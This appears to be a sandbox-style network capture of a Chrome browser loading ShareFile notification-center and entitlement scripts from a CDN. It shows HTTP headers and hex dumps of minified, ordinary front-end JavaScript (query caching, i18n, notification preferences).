                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC16384INData Raw: 3a 22 6c 6f 61 64 4c 61 6e 67 75 61 67 65 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 53 28 29 3b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 5b 65 5d 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 72 65 6c 6f 61 64 7c 7c 5b 5d 2c 69 3d 65 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 2e 69 6e 64 65 78 4f 66 28 65 29 3c 30 7d 29 29 3b 72 65 74 75 72 6e 20 69 2e 6c 65 6e 67 74 68 3f 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 72 65 6c 6f 61 64 3d 6e 2e 63 6f 6e 63 61 74 28 69 29 2c 74 68 69 73 2e 6c 6f 61 64 52 65 73 6f 75 72 63 65 73 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 72 65 73 6f 6c 76 65 28 29 2c 74 26 26 74 28 65
                                                                                                                                                                                                                      Data Ascii: :"loadLanguages",value:function(e,t){var r=S();"string"==typeof e&&(e=[e]);var n=this.options.preload||[],i=e.filter((function(e){return n.indexOf(e)<0}));return i.length?(this.options.preload=n.concat(i),this.loadResources((function(e){r.resolve(),t&&t(e
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC16384INData Raw: 63 61 73 65 20 35 39 3a 63 61 73 65 20 31 32 33 3a 63 61 73 65 20 31 32 35 3a 72 65 74 75 72 6e 20 34 3b 63 61 73 65 20 35 38 3a 72 65 74 75 72 6e 20 33 3b 63 61 73 65 20 33 34 3a 63 61 73 65 20 33 39 3a 63 61 73 65 20 34 30 3a 63 61 73 65 20 39 31 3a 72 65 74 75 72 6e 20 32 3b 63 61 73 65 20 34 31 3a 63 61 73 65 20 39 33 3a 72 65 74 75 72 6e 20 31 7d 72 65 74 75 72 6e 20 30 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 29 7b 72 65 74 75 72 6e 20 6d 3d 76 3d 31 2c 79 3d 64 28 4f 3d 65 29 2c 62 3d 30 2c 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 41 28 65 29 7b 72 65 74 75 72 6e 20 4f 3d 22 22 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 65 29 7b 72 65 74 75 72 6e 20 73 28 50 28 62 2d 31 2c 54 28 39 31 3d 3d 3d 65 3f 65 2b 32 3a 34 30 3d 3d 3d 65 3f 65 2b 31 3a 65 29 29 29
                                                                                                                                                                                                                      Data Ascii: case 59:case 123:case 125:return 4;case 58:return 3;case 34:case 39:case 40:case 91:return 2;case 41:case 93:return 1}return 0}function R(e){return m=v=1,y=d(O=e),b=0,[]}function A(e){return O="",e}function N(e){return s(P(b-1,T(91===e?e+2:40===e?e+1:e)))
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC16384INData Raw: 66 65 74 63 68 53 74 61 74 75 73 3a 69 2c 70 72 65 64 69 63 61 74 65 3a 6f 2c 71 75 65 72 79 4b 65 79 3a 61 2c 73 74 61 6c 65 3a 73 7d 3d 65 3b 69 66 28 6a 28 61 29 29 69 66 28 6e 29 7b 69 66 28 74 2e 71 75 65 72 79 48 61 73 68 21 3d 3d 76 28 61 2c 74 2e 6f 70 74 69 6f 6e 73 29 29 72 65 74 75 72 6e 21 31 7d 65 6c 73 65 20 69 66 28 21 62 28 74 2e 71 75 65 72 79 4b 65 79 2c 61 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 22 61 6c 6c 22 21 3d 3d 72 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 69 73 41 63 74 69 76 65 28 29 3b 69 66 28 22 61 63 74 69 76 65 22 3d 3d 3d 72 26 26 21 65 29 72 65 74 75 72 6e 21 31 3b 69 66 28 22 69 6e 61 63 74 69 76 65 22 3d 3d 3d 72 26 26 65 29 72 65 74 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f
                                                                                                                                                                                                                      Data Ascii: fetchStatus:i,predicate:o,queryKey:a,stale:s}=e;if(j(a))if(n){if(t.queryHash!==v(a,t.options))return!1}else if(!b(t.queryKey,a))return!1;if("all"!==r){const e=t.isActive();if("active"===r&&!e)return!1;if("inactive"===r&&e)return!1}return!("boolean"==typeo
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC13794INData Raw: 22 2c 6d 75 74 61 74 69 6f 6e 3a 65 7d 29 7d 63 6c 65 61 72 28 29 7b 46 2e 62 61 74 63 68 28 28 28 29 3d 3e 7b 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 74 68 69 73 2e 72 65 6d 6f 76 65 28 65 29 7d 29 29 7d 29 29 7d 67 65 74 41 6c 6c 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 7d 66 69 6e 64 28 65 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 65 2e 65 78 61 63 74 26 26 28 65 2e 65 78 61 63 74 3d 21 30 29 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 2e 66 69 6e 64 28 28 74 3d 3e 6d 28 65 2c 74 29 29 29 7d 66 69 6e 64 41 6c 6c 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 2e 66 69 6c 74 65 72 28 28 74 3d 3e 6d 28 65 2c 74 29 29 29 7d 6e 6f 74 69 66 79
                                                                                                                                                                                                                      Data Ascii: ",mutation:e})}clear(){F.batch((()=>{this.mutations.forEach((e=>{this.remove(e)}))}))}getAll(){return this.mutations}find(e){return void 0===e.exact&&(e.exact=!0),this.mutations.find((t=>m(e,t)))}findAll(e){return this.mutations.filter((t=>m(e,t)))}notify
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC16384INData Raw: 65 28 29 7b 76 61 72 20 65 3b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 2e 6c 65 6e 67 74 68 7c 7c 6e 75 6c 6c 3d 3d 28 65 3d 74 68 69 73 2e 63 75 72 72 65 6e 74 4d 75 74 61 74 69 6f 6e 29 7c 7c 65 2e 72 65 6d 6f 76 65 4f 62 73 65 72 76 65 72 28 74 68 69 73 29 7d 6f 6e 4d 75 74 61 74 69 6f 6e 55 70 64 61 74 65 28 65 29 7b 74 68 69 73 2e 75 70 64 61 74 65 52 65 73 75 6c 74 28 29 3b 63 6f 6e 73 74 20 74 3d 7b 6c 69 73 74 65 6e 65 72 73 3a 21 30 7d 3b 22 73 75 63 63 65 73 73 22 3d 3d 3d 65 2e 74 79 70 65 3f 74 2e 6f 6e 53 75 63 63 65 73 73 3d 21 30 3a 22 65 72 72 6f 72 22 3d 3d 3d 65 2e 74 79 70 65 26 26 28 74 2e 6f 6e 45 72 72 6f 72 3d 21 30 29 2c 74 68 69 73 2e 6e 6f 74 69 66 79 28 74 29 7d 67 65 74 43 75 72 72 65 6e 74 52 65 73 75 6c 74 28 29 7b 72 65 74
                                                                                                                                                                                                                      Data Ascii: e(){var e;this.listeners.length||null==(e=this.currentMutation)||e.removeObserver(this)}onMutationUpdate(e){this.updateResult();const t={listeners:!0};"success"===e.type?t.onSuccess=!0:"error"===e.type&&(t.onError=!0),this.notify(t)}getCurrentResult(){ret


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      70192.168.2.174979013.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC578OUTGET /sharefile-web/sharefiledev-entitlements-pilet/0.1.54/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 10:55:23 GMT
                                                                                                                                                                                                                      Last-Modified: Fri, 13 Sep 2024 12:33:19 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 bb1fd0922e473ba97ff6a00f6c71141a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: Z9udyU53jUhGOaTZi5TrLFoIQEe3_Wd5309Ej-xLvV_hmNZXp_eYkQ==
                                                                                                                                                                                                                      Age: 31251
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      71192.168.2.174979213.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC579OUTGET /sharefile-web/sharefiledev-notification-center/0.11.0/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 10:55:24 GMT
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 23:07:31 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 6642832e0f3e501fb9fdc5f35d4351d8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: JsN7p3n22RrWX63yEjx4A43GnOZBOCgCo05Rv3FTzRAbMM0TVcs_lw==
                                                                                                                                                                                                                      Age: 31250
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      72192.168.2.174979113.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC425OUTGET /sharefile-web/sharefiledev-notification-center/0.11.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC522INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 463080
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 23:07:31 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:13 GMT
                                                                                                                                                                                                                      ETag: "b4c879d3598119e0e769c9a0e8a15bf0"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 eab88762658052b4a1e386f8521a38ce.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: es8erB8hpBngN-cfGJ4wFTWqZxIZ2wN3YVDKM3lli76pJnaJoJcFVA==
                                                                                                                                                                                                                      Age: 1
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 6e 6f 74 69 66 69 63 61 74 69 6f 6e 63 65 6e 74 65 72 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 6f 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevnotificationcenter,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","tslib"],(function(e,t){var n={},r={},i={},a={},s={},o={},c={};return{setters:[function
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC16384INData Raw: 69 71 75 65 20 69 64 65 6e 74 69 66 69 65 72 20 66 6f 72 20 79 6f 75 72 20 42 65 61 6d 73 20 69 6e 73 74 61 6e 63 65 22 2c 74 79 70 65 3a 22 73 74 72 69 6e 67 22 2c 72 65 71 75 69 72 65 64 3a 21 30 7d 2c 7b 6b 65 79 3a 6f 2e 53 65 63 72 65 74 4b 65 79 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 22 53 65 63 72 65 74 20 4b 65 79 22 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 22 54 68 65 20 73 65 63 72 65 74 20 6b 65 79 20 79 6f 75 72 20 73 65 72 76 65 72 20 77 69 6c 6c 20 75 73 65 20 74 6f 20 61 63 63 65 73 73 20 79 6f 75 72 20 42 65 61 6d 73 20 69 6e 73 74 61 6e 63 65 22 2c 74 79 70 65 3a 22 73 74 72 69 6e 67 22 2c 72 65 71 75 69 72 65 64 3a 21 30 7d 2c 2e 2e 2e 45 5d 2c 6d 65 3d 5b 7b 6b 65 79 3a 6f 2e 41 63 63 65 73 73 4b 65 79 2c 64 69 73 70 6c 61 79 4e 61 6d 65
                                                                                                                                                                                                                      Data Ascii: ique identifier for your Beams instance",type:"string",required:!0},{key:o.SecretKey,displayName:"Secret Key",description:"The secret key your server will use to access your Beams instance",type:"string",required:!0},...E],me=[{key:o.AccessKey,displayName
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC16384INData Raw: 41 73 68 6b 68 61 62 61 64 22 2c 65 2e 41 53 49 41 5f 41 54 59 52 41 55 3d 22 41 73 69 61 2f 41 74 79 72 61 75 22 2c 65 2e 41 53 49 41 5f 42 41 47 48 44 41 44 3d 22 41 73 69 61 2f 42 61 67 68 64 61 64 22 2c 65 2e 41 53 49 41 5f 42 41 48 52 41 49 4e 3d 22 41 73 69 61 2f 42 61 68 72 61 69 6e 22 2c 65 2e 41 53 49 41 5f 42 41 4b 55 3d 22 41 73 69 61 2f 42 61 6b 75 22 2c 65 2e 41 53 49 41 5f 42 41 4e 47 4b 4f 4b 3d 22 41 73 69 61 2f 42 61 6e 67 6b 6f 6b 22 2c 65 2e 41 53 49 41 5f 42 41 52 4e 41 55 4c 3d 22 41 73 69 61 2f 42 61 72 6e 61 75 6c 22 2c 65 2e 41 53 49 41 5f 42 45 49 52 55 54 3d 22 41 73 69 61 2f 42 65 69 72 75 74 22 2c 65 2e 41 53 49 41 5f 42 49 53 48 4b 45 4b 3d 22 41 73 69 61 2f 42 69 73 68 6b 65 6b 22 2c 65 2e 41 53 49 41 5f 42 52 55 4e 45 49 3d
                                                                                                                                                                                                                      Data Ascii: Ashkhabad",e.ASIA_ATYRAU="Asia/Atyrau",e.ASIA_BAGHDAD="Asia/Baghdad",e.ASIA_BAHRAIN="Asia/Bahrain",e.ASIA_BAKU="Asia/Baku",e.ASIA_BANGKOK="Asia/Bangkok",e.ASIA_BARNAUL="Asia/Barnaul",e.ASIA_BEIRUT="Asia/Beirut",e.ASIA_BISHKEK="Asia/Bishkek",e.ASIA_BRUNEI=
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC14808INData Raw: 3d 22 6c 74 22 2c 65 2e 4c 54 45 3d 22 6c 74 65 22 2c 65 2e 45 51 3d 22 65 71 22 2c 65 2e 4e 45 3d 22 6e 65 22 7d 28 79 74 7c 7c 28 79 74 3d 7b 7d 29 29 3b 79 74 2e 45 51 55 41 4c 53 2c 79 74 2e 54 49 54 4c 45 43 41 53 45 2c 79 74 2e 55 50 50 45 52 43 41 53 45 2c 79 74 2e 4c 4f 57 45 52 43 41 53 45 2c 79 74 2e 50 4c 55 52 41 4c 49 5a 45 2c 79 74 2e 44 41 54 45 46 4f 52 4d 41 54 2c 79 74 2e 55 4e 49 51 55 45 2c 79 74 2e 47 52 4f 55 50 5f 42 59 2c 79 74 2e 53 4f 52 54 5f 42 59 2c 79 74 2e 4e 55 4d 42 45 52 46 4f 52 4d 41 54 2c 79 74 2e 49 31 38 4e 2c 79 74 2e 47 54 2c 79 74 2e 47 54 45 2c 79 74 2e 4c 54 2c 79 74 2e 4c 54 45 2c 79 74 2e 45 51 2c 79 74 2e 4e 45 3b 76 61 72 20 45 74 3b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 46 4f 52 47 4f 54 5f 50 41 53
                                                                                                                                                                                                                      Data Ascii: ="lt",e.LTE="lte",e.EQ="eq",e.NE="ne"}(yt||(yt={}));yt.EQUALS,yt.TITLECASE,yt.UPPERCASE,yt.LOWERCASE,yt.PLURALIZE,yt.DATEFORMAT,yt.UNIQUE,yt.GROUP_BY,yt.SORT_BY,yt.NUMBERFORMAT,yt.I18N,yt.GT,yt.GTE,yt.LT,yt.LTE,yt.EQ,yt.NE;var Et;!function(e){e.FORGOT_PAS
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC441INData Raw: 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 2c 24 6e 3d 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6e 61 76 69 67 61 74 6f 72 26 26 6e 61 76 69 67 61 74 6f 72 7c 7c 75 6e 64 65 66 69 6e 65 64 2c 5a 6e 3d 4a 6e 26 26 28 21 24 6e 7c 7c 5b 22 52 65 61 63 74 4e 61 74 69 76 65 22 2c 22 4e 61 74 69 76 65 53 63 72 69 70 74 22 2c 22 4e 53 22 5d 2e 69 6e 64 65 78 4f 66 28 24 6e 2e 70 72 6f 64 75 63 74 29 3c 30 29 2c 58 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 2e 69 6d 70 6f 72 74
                                                                                                                                                                                                                      Data Ascii: fined"!=typeof document,$n="object"==typeof navigator&&navigator||undefined,Zn=Jn&&(!$n||["ReactNative","NativeScript","NS"].indexOf($n.product)<0),Xn="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope&&"function"==typeof self.import
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC12792INData Raw: 3d 65 2e 6c 65 6e 67 74 68 3b 69 66 28 61 3d 21 61 26 26 4d 6e 2e 69 73 41 72 72 61 79 28 72 29 3f 72 2e 6c 65 6e 67 74 68 3a 61 2c 6f 29 72 65 74 75 72 6e 20 4d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 28 72 2c 61 29 3f 72 5b 61 5d 3d 5b 72 5b 61 5d 2c 6e 5d 3a 72 5b 61 5d 3d 6e 2c 21 73 3b 72 5b 61 5d 26 26 4d 6e 2e 69 73 4f 62 6a 65 63 74 28 72 5b 61 5d 29 7c 7c 28 72 5b 61 5d 3d 5b 5d 29 3b 72 65 74 75 72 6e 20 74 28 65 2c 6e 2c 72 5b 61 5d 2c 69 29 26 26 4d 6e 2e 69 73 41 72 72 61 79 28 72 5b 61 5d 29 26 26 28 72 5b 61 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6f 6e 73 74 20 74 3d 7b 7d 2c 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 6c 65 74 20 72 3b 63 6f 6e 73 74 20 69 3d 6e 2e 6c 65 6e 67 74 68 3b 6c 65 74 20 61 3b 66 6f 72 28 72 3d 30 3b 72
                                                                                                                                                                                                                      Data Ascii: =e.length;if(a=!a&&Mn.isArray(r)?r.length:a,o)return Mn.hasOwnProp(r,a)?r[a]=[r[a],n]:r[a]=n,!s;r[a]&&Mn.isObject(r[a])||(r[a]=[]);return t(e,n,r[a],i)&&Mn.isArray(r[a])&&(r[a]=function(e){const t={},n=Object.keys(e);let r;const i=n.length;let a;for(r=0;r
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC16384INData Raw: 6f 6e 28 65 29 7b 63 6f 6e 73 74 20 74 3d 2f 5e 28 5b 2d 2b 5c 77 5d 7b 31 2c 32 35 7d 29 28 3a 3f 5c 2f 5c 2f 7c 3a 29 2f 2e 65 78 65 63 28 65 29 3b 72 65 74 75 72 6e 20 74 26 26 74 5b 31 5d 7c 7c 22 22 7d 28 72 2e 75 72 6c 29 3b 45 26 26 2d 31 3d 3d 3d 74 72 2e 70 72 6f 74 6f 63 6f 6c 73 2e 69 6e 64 65 78 4f 66 28 45 29 3f 6e 28 6e 65 77 20 77 6e 28 22 55 6e 73 75 70 70 6f 72 74 65 64 20 70 72 6f 74 6f 63 6f 6c 20 22 2b 45 2b 22 3a 22 2c 77 6e 2e 45 52 52 5f 42 41 44 5f 52 45 51 55 45 53 54 2c 65 29 29 3a 68 2e 73 65 6e 64 28 69 7c 7c 6e 75 6c 6c 29 7d 29 29 7d 2c 54 72 3d 28 65 2c 74 29 3d 3e 7b 63 6f 6e 73 74 7b 6c 65 6e 67 74 68 3a 6e 7d 3d 65 3d 65 3f 65 2e 66 69 6c 74 65 72 28 42 6f 6f 6c 65 61 6e 29 3a 5b 5d 3b 69 66 28 74 7c 7c 6e 29 7b 6c 65 74
                                                                                                                                                                                                                      Data Ascii: on(e){const t=/^([-+\w]{1,25})(:?\/\/|:)/.exec(e);return t&&t[1]||""}(r.url);E&&-1===tr.protocols.indexOf(E)?n(new wn("Unsupported protocol "+E+":",wn.ERR_BAD_REQUEST,e)):h.send(i||null)}))},Tr=(e,t)=>{const{length:n}=e=e?e.filter(Boolean):[];if(t||n){let
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC9200INData Raw: 65 6e 63 65 73 2f 67 6c 6f 62 61 6c 22 29 7d 29 29 7d 75 70 64 61 74 65 53 75 62 73 63 72 69 62 65 72 50 72 65 66 65 72 65 6e 63 65 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6c 69 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 72 65 74 75 72 6e 20 79 69 65 6c 64 20 74 68 69 73 2e 68 74 74 70 43 6c 69 65 6e 74 2e 70 61 74 63 68 28 60 2f 77 69 64 67 65 74 73 2f 70 72 65 66 65 72 65 6e 63 65 73 2f 24 7b 65 7d 60 2c 7b 63 68 61 6e 6e 65 6c 3a 7b 74 79 70 65 3a 74 2c 65 6e 61 62 6c 65 64 3a 6e 7d 7d 29 7d 29 29 7d 75 70 64 61 74 65 53 75 62 73 63 72 69 62 65 72 47 6c 6f 62 61 6c 50 72 65 66 65 72 65 6e 63 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 6c 69 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20
                                                                                                                                                                                                                      Data Ascii: ences/global")}))}updateSubscriberPreference(e,t,n){return li(this,void 0,void 0,(function*(){return yield this.httpClient.patch(`/widgets/preferences/${e}`,{channel:{type:t,enabled:n}})}))}updateSubscriberGlobalPreference(e,t){return li(this,void 0,void
                                                                                                                                                                                                                      2024-11-05 19:36:14 UTC16384INData Raw: 69 6f 6e 73 41 73 52 65 61 64 28 7b 6d 65 73 73 61 67 65 49 64 3a 65 2c 6c 69 73 74 65 6e 65 72 3a 74 2c 6f 6e 53 75 63 63 65 73 73 3a 6e 2c 6f 6e 45 72 72 6f 72 3a 69 7d 29 7b 72 65 74 75 72 6e 20 72 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 2a 28 29 7b 74 68 69 73 2e 61 73 73 65 72 74 53 65 73 73 69 6f 6e 49 6e 69 74 69 61 6c 69 7a 65 64 28 29 3b 63 6f 6e 73 74 7b 72 65 73 75 6c 74 3a 72 2c 75 6e 73 75 62 73 63 72 69 62 65 3a 61 7d 3d 74 68 69 73 2e 71 75 65 72 79 53 65 72 76 69 63 65 2e 73 75 62 73 63 72 69 62 65 4d 75 74 61 74 69 6f 6e 28 7b 6f 70 74 69 6f 6e 73 3a 7b 6d 75 74 61 74 69 6f 6e 46 6e 3a 65 3d 3e 74 68 69 73 2e 61 70 69 2e 6d 61 72 6b 4d 65 73 73 61 67 65 41 73 28 65 2e 6d 65 73 73 61 67 65 49
                                                                                                                                                                                                                      Data Ascii: ionsAsRead({messageId:e,listener:t,onSuccess:n,onError:i}){return r(this,void 0,void 0,(function*(){this.assertSessionInitialized();const{result:r,unsubscribe:a}=this.queryService.subscribeMutation({options:{mutationFn:e=>this.api.markMessageAs(e.messageI
